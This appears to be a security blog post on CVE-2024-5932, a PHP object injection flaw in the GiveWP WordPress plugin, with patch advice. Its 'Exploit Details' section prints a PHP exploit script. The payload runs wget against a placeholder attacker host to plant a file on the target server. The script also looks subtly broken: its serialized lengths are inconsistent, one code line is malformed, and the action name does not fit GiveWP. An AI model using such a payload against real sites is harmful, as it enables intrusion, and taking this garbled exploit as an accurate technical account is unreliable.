A new vulnerability, identified as CVE-2024-5932, has been discovered in the GiveWP - Donation Plugin and Fundraising Platform WordPress plugin, which allows unauthenticated attackers to execute Remote Code Execution (RCE) and delete arbitrary files. The vulnerability is present in all versions up to, and including, 3.14.1. In this post, we will cover the details of this vulnerability, the exploit, and how to fix it.

Vulnerability Details

The GiveWP Donation Plugin and Fundraising Platform is a popular WordPress plugin that helps site owners create and manage fundraising campaigns and accept donations. The vulnerability stems from the give_title parameter, which is used to unserialize untrusted input, leading to a PHP Object Injection.

PHP Object Injection is a dangerous vulnerability that occurs when user-supplied input is not properly sanitized and is used to instantiate an instance of a PHP Object. Attackers can manipulate the PHP object and use it to execute malicious code remotely.

The exploited code snippet can be found below

public function unserialize($data)
{
   $this->data = unserialize($data);
   return $this->title;
}

Exploit Details

The exploit utilizes a PHP Object Payload (POP) chain. A POP chain is when multiple objects with dependent properties are serialized together. An attacker injects their malicious PHP object into the give_title parameter, which results in Remote Code Execution (RCE) and deletion of arbitrary files on the target website.

Here is an example of the exploit in action

$payload = urlencode('O:8:"Give_Form":1:{s:14:"_post_metadata";a:1:{s:10:"give_title";O:8:"WP_Query":6:{s:10:"query_vars";a:1:{s:6:"search";s:24:"';system('wget http://attacker_url/malicious_file.txt -O /var/www/html/wp-content/uploads/malicious_file.txt') . ';";}s:12:"queried_object";N;s:13:"queried_object_id";N;s:9:"request";N;s:5:"posts";b:1;s:12:"max_num_pages";b:1;}}}');
$url = "http://target_website.com/wp-admin/admin-post.php?action=gf_serialized_import&give_form_string="; . $payload;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
curl_close($ch);

In this example, the attacker is using the vulnerability to download a malicious file and save it to the target server.

Original References

- CVE-2024-5932
- GiveWP – Donation Plugin and Fundraising Platform

The vulnerability has been fixed in GiveWP Donation Plugin and Fundraising Platform version 3.14.2 and above. To protect your WordPress site from this vulnerability, it is highly recommended to update the plugin to the latest version available.

Additionally, it is important to regularly update all plugins and themes to their latest versions and make sure to follow recommended security practices, such as strong passwords and keeping regular backups of your website.

Conclusion

CVE-2024-5932 is a critical vulnerability that affects many WordPress websites using the GiveWP Donation Plugin and Fundraising Platform. It is important for website owners to patch their vulnerable plugin and ensure their site is secured against unauthenticated attackers looking to exploit this PHP Object Injection. Regular updates and following recommended security practices can help protect your site from future vulnerabilities.

Timeline

Published on: 08/20/2024 02:15:04 UTC
Last modified on: 08/20/2024 15:44:20 UTC